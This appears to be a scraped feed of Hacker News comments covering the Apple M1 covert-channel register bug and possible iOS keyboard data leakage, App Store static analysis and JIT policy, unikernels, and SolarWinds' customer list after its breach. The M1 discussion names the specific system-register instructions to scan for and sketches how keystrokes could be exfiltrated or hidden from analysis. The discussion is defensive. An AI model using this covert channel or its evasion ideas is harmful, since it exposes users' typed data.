While Marcan has written in a very entertaining fashion, there is perhaps one application of this vulnerability that wasn't considered.
If this can be reproduced on the iPhone, it can lead to 3rd party keyboards exfiltrating data. By default, keyboard app extensions are sandboxed away from their owning applications [0], but they may communicate with the app over this channel and leak data. It's not as easy as I describe because the app would have to be alive and scheduled on the same cluster, but it's within the realm of possibility.
> However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple is planning to deploy these checks (or whether they have already done so), but they are aware of the potential issue and it would be reasonable to expect they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.
As I mentioned below and on the disclosure page, it's trivial for Apple to reliably detect this in apps submitted to the App Store and reject them, so I'm not worried. There's no such thing as "obfuscated" malware in the traditional sense on the App Store. You can obfuscate the code flow all you want, but all executable code has to be signed to run on iDevices. If you try to use this register, the instruction will be there for all to see. You can't use self-modifying code or packers on iOS.
I expect Apple to include checks for this in their App Store static analyzer, if they aren't already rejecting sysreg instructions, which mitigates the issue. Obviously JIT isn't allowed in the App Store, so this should be an effective strategy.
JITC is irrelevant actually. This is not an argument for blocking it.
Firstly, no normal JITC will ever emit instructions that access undocumented system registers. Any JITC that comes from a known trusted source (and they're expensive to develop, so they basically all do) would be signed/whitelisted already and not be a threat anyway.
So what about new/unrecognised programs or dylibs that request JITC access? Well, Apple already insist on creating many categories of disallowed thing in the app store that can't be detected via static analysis. For example, they disallow changing the behaviour of the app after it is released via downloaded data files, which is both very vague and impossible to enforce statically. So it doesn't fundamentally change the nature of things.
But what if you insist on being able to specifically fix your own obscure CPU bugs via static analysis? Well, then XNU can just implement the following strategy:
1. If a dylib requests a JITC entitlement, and the Mach-O CD Hash is on a whitelist of "known legit" compilers, allow.
2. Otherwise, require pages to be W^X. So the JITC requests some writeable pages, fills them with code, and then requests the kernel to make the pages executable. At that point XNU suspends the process and scans the requested pages for illegal instruction sequences. The pages are hot in the cache anyway and the checks are simple, so it's no big deal. If the static checks pass, the page is flipped to be executable but not writeable and the app can proceed.
Apple's ban on JITC has never really made much technical sense to me. It feels like a way to save costs on program static analysis investment and to try and force developers to use Apple's own languages and toolchains, with security being used as a fig leaf. It doesn't make malware harder to write but it definitely exposes them to possible legal hot water as it means competitors can't build first-party competitive web browsers for the platform. The only thing that saves them is their own high prices and refusal to try and grab high enough market share.
Possibly, the article has been updated in the last couple of hours, but it now says:
*What about iOS?*
iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet.
Only if detection requires solving the halting problem. It does not. You just look for certain instructions that normal code shouldn't use. JIT isn't allowed (which means all instructions the program uses can be checked statically), so it should be easy enough.
Marcan said elsewhere in the thread that the executable section on ARM also includes constant pools, so if I understand correctly, you can hide instructions in there and make it intractable for a static analyzer to determine whether they are really instructions or just data.
The real saving grace here is that iOS app binaries are submitted as LLVM IR instead of ARM machine code.
> you can hide instructions in there and make it intractable for a static analyzer to determine whether they are really instructions or just data.
Uh, no? This is very tractable - O(N) in the size of the binary - just check, for every single byte offset in executable memory, whether that offset, if jumped to or continued to from the previous instruction, would decode into a `msr s3_5_c15_c10_1, reg` or `mrs reg, s3_5_c15_c10_1` instruction.
IIUC, the decoding of a M1 ARM instruction doesn't depend on anything other than the instruction pointer, so you only need one pass, and you only need to decode one instruction, since the following instruction will occur at a later byte address.
Edit: unless its executable section isn't read-only, in which case static analyzers can't prove much of anything with any real confidence.
Yes but if program constants are in executable memory, then you can end up with byte sequences that represent numeric values but also happen to decode into the problematic instructions.
For example, this benign line of code would trip a static analyzer looking for `msr s3_5_c15_c10_1, x15` in the way you described:
I said false positives are an issue in the context of a "dumb" real-time kernel-side scan. App Store submission is different. They can afford to have false positives and have a human look at them to see if they look suspicious.
There are 26 fixed bits in the problem instructions, which means a false positive rate of one in 256MiB of uniformly distributed constant data (the false positive rate is, of course, zero for executable code, which is the majority of the text section of a binary). Constant data is not uniformly distributed. So, in practice, I expect this to be a rather rare occurrence.
I just looked at some mac binaries, and it seems movk and constant section loads have largely superseded arm32 style inline constant pools. I still see some data in the text section, but it seems to mostly be offset tables before functions (not sure what it is, might have to do with stack unwinding), none of which seems like it could ever match the instruction encoding for that register. So in practice I don't think any of this will be a problem. It seems this was changed in gcc in 2015 [0], I assume LLVM does the same.
Only on watchOS is Bitcode required (to support the watch's 32-bit to 64-bit transition), on all other platforms it's optional and often turned off, as it makes a variety of things harder, like generating dSYMs for crash reporting.
Oh. Then I don't see how this can be reliably mitigated, other than patching LLVM to avoid writing the `msr s3_5_c15_c10_1` byte sequence in constant pools and then rejecting any binary that contains the byte sequence in an executable section. That seems difficult to get done before someone is able to submit a PoC malicious keyboard to the store, potentially turning this "joke" bug into a real problem. What am I missing?
WOX, except transmuting user code pages to data pages (reading its own code should be fine since it was loaded from a user binary anyhow) or a supervisor-level JIT helper to check and transmute user data pages into user code pages (check that user-mode JITs aren't being naughty).
There's often two kinds of loadable data pages: initialized constants (RO), initialized variables (RW), so some will need to be writable because pesky globals will never seem to die. Neither of should ever have execute or that will cross the streams and end the universe. I'm annoyed when constants or constant pools are loaded into RW data pages because it doesn't make sense.
So, it's basically an honor system. You cannot detect JIT, because there aren't "certain instructions" that aren't allowed - it's just certain registers that programs shouldn't access (but access patterns can be changed in branching code to ensure Apple won't catch it in their sandboxes).
Besides, even if certain instructions are not allowed, a program can modify itself, it's hard to detect if a program modifies itself without executing the program under specific conditions, or running the program in a hypervisor.
So, it's basically an honor system. You cannot detect JIT, because there aren't "certain instructions" that aren't allowed - it's just certain registers that programs shouldn't access (but access patterns can be changed in branching code to ensure Apple won't catch it in their sandboxes).
Besides, even if certain instructions are not allowed, a program can modify itself, it's hard to detect if a program modifies itself without executing the program under specific conditions.
You're missing the point, JIT not allowed means programs may not modify themselves. They're in read+execute only memory and cannot allocate writable+executable memory.
IPhones use A12/13/14 chip and the vulnerability is not confirmed there. Also, the post mentions that if you have two malware apps on your device, they can communicate in many other ways, so I'm not sure what's new here.
iPhones do not use the A1 chip as of quite a few years ago. Besides, the M1 and the A12+ have significant microarchitectural similarities, to the point that the DTK used the A12Z.
Furthermore, the keyboard app extension and the keyboard app are installed as a single package whose components are not supposed to communicate, hence why I brought this up.
You can still pull the database from an iOS backup on your Mac or created from `idevicebackup2`.
The file is named `1b6b187a1b60b9ae8b720c79e2c67f472bab09c0`, `275ee4a160b7a7d60825a46b0d3ff0dcdb2fbc9d`, or `7c7fba66680ef796b916b067077cc246adacf01d`.
On macOS, these executables can be signed with a detached signature. Surprisingly, the embedded codesignature also works (but the signature is stored in an extended attribute on the filesystem).
Speaking from experience, that's not necessarily true. EU countries accept equivalent experience in lieu of academic qualifications.
Assuming that you are offered a position that pays well, and have around 5-ish years of experience, emigration is a breeze.
My experience with getting might not be universal since I work in a niche CS field, but getting a work permit (also alluded to by other commenters) was trivial and likely applies to everyone.
This seems to be quite similar to the other unikernel that was posted recently [1]. It would be useful to have an in-depth comparison of these (and other) unikernels, especially with regard to performance and compatibility.
I can see that HermiTux has the ability to select only the syscalls needed by the embedded program, and to transform syscalls to function calls, which seems quite interesting.
That's certainly part of the point (and probably one of the main performance benefits). However, even if this doesn't happen, a unikernel still gives the advantage that it's much more difficult to run undesired code and is likely to improve security.
> OSv was originally designed and implemented by Cloudius Systems (now ScyllaDB) however currently it is being maintained and enhanced by a small community of volunteers.
Yeah that doesn't sound conclusive in either direction -- not clear if they made this on the way to ScyllaDB. I took another look just in case and found a source[0]:
> After much research into the market and technology, in mid-2014 the team decided to pivot away from OSv (still a live project). Instead they decided to embrace the Cassandra architecture but rewrite it from scratch in native code with all of the know-how of years of kernel/hypervisor coding. This would become the Scylla database.
I’m not in favour of having public client lists, especially when you’re a critical software vendor — but this list is just terrifying. There are a lot of big there, and I won’t be surprised to hear of more incidents in the coming days.
“ More than 425 of the US Fortune 500
All ten of the top ten US telecommunications companies
All five branches of the US Military
The US Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States
All five of the top five US accounting firms”
What’s the opposite of security through obscurity?
Any fortune 500 company that's been around for more than a decade probably has one of every enterprise software product running somewhere. When I worked at a big bank, when we acquired any company, large or small, the software stack they used usually just got bottled up where they were, and the client list on the vendor's website just got updated to the new company name.
I mean that company list has "smith barney" which doesn't exist anymore.
SolarWinds’ comprehensive products and services are used by more than 300,000 customers worldwide, including military, Fortune 500 companies, government agencies, and education institutions. Our customer list includes:
- More than 425 of the US Fortune 500
- All ten of the top ten US telecommunications companies
- All five branches of the US Military
- The US Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States
- All five of the top five US accounting firms
- Hundreds of universities and colleges worldwide
Partial customer listing:
Acxiom
Ameritrade
AT&T;
Bellsouth Telecommunications
Best Western Intl.
Blue Cross Blue Shield
Booz Allen Hamilton
Boston Consulting
Cable & Wireless
Cablecom Media AG
Cablevision
CBS
Charter Communications
Cisco
CitiFinancial
City of Nashville
City of Tampa
Clemson University
Comcast Cable
Credit Suisse
Dow Chemical
EMC Corporation
Ericsson
Ernst and Young
Faurecia
Federal Express
Federal Reserve Bank
Fibercloud
Fiserv
Ford Motor Company
Foundstone
Gartner
Gates Foundation
General Dynamics
Gillette Deutschland GmbH
GTE
H&R; Block
Harvard University
Hertz Corporation
ING Direct
IntelSat
J.D. Byrider
Johns Hopkins University
Kennedy Space Center
Kodak
Korea Telecom
Leggett and Platt
Level 3 Communications
Liz Claiborne
Lockheed Martin
Lucent
MasterCard
McDonald’s Restaurants
Microsoft
National Park Service
NCR
NEC
Nestle
New York Power Authority
New York Times
Nielsen Media Research
Nortel
Perot Systems Japan
Phillips Petroleum
Pricewaterhouse Coopers
Procter & Gamble
Sabre
Saks
San Francisco Intl. Airport
Siemens
Smart City Networks
Smith Barney
Smithsonian Institute
Sparkasse Hagen
Sprint
St. John’s University
Staples
Subaru
Supervalu
Swisscom AG
Symantec
Telecom Italia
Telenor
Texaco
The CDC
The Economist
Time Warner Cable
U.S. Air Force
University of Alaska
University of Kansas
University of Oklahoma
US Dept. Of Defense
US Postal Service
US Secret Service
Visa USA
Volvo
Williams Communications
Yahoo
For those at least you don’t have to install SolarWinds code on your server to use them. They’re endpoints for syslog. As long as your logs don’t contain secrets (they shouldn’t) then it’s not great but not terrible.
Well I don't see real practical reason for keeping it secret.
If you look at operation model of threat actors, even with current hack, they have their targets and no one is going to say "hey they have solar winds let's hack them". Threat actors have their budget, limited time and goals. They could also find this information by other osint means. Even if they have it on that page, they still need to make their research.
Even if SolarWinds would not have a list on their page they are so big that you can count them as interesting target anyway. It is the same with Google and MSFT you can safely assume if you hack them, some of your targets will use some tools from those companies.
I mean security by obscurity is fine, but I don't see what kind of value it would bring in this scenario.
> Well I don't see real practical reason for keeping it secret.
Generally, you have to get a company's permission to use it's name or logo as an endorsement. That agreement has stipulations, such as being revoked if the association could bring disrepute or reputational harm to the endorser.
I'm sure none of the companies on that list want their investors calling the IR to ask about whether this event is a material issue for the company.
I'm not a security person, but my first thought is that you're not trying to avoid "hey they have solar winds let's hack them," but rather "Hey, I want to attack Large Co., and a quick Google search says they run software from these 14 companies, so compromising any of those might get me in."
General reminder that your funny 404 page becomes instantly unfunny the second your tech department both publicly and catastrophically shits the bed: https://i.imgur.com/kNbScVH.png
If you see the range of offering, it makes more sense, and doesn't sound as scary (or not more than if you would see a list of Microsoft customers for example).
If this can be reproduced on the iPhone, it can lead to 3rd party keyboards exfiltrating data. By default, keyboard app extensions are sandboxed away from their owning applications [0], but they may communicate with the app over this channel and leak data. It's not as easy as I describe because the app would have to be alive and scheduled on the same cluster, but it's within the realm of possibility.
[0]: https://developer.apple.com/library/archive/documentation/Ge...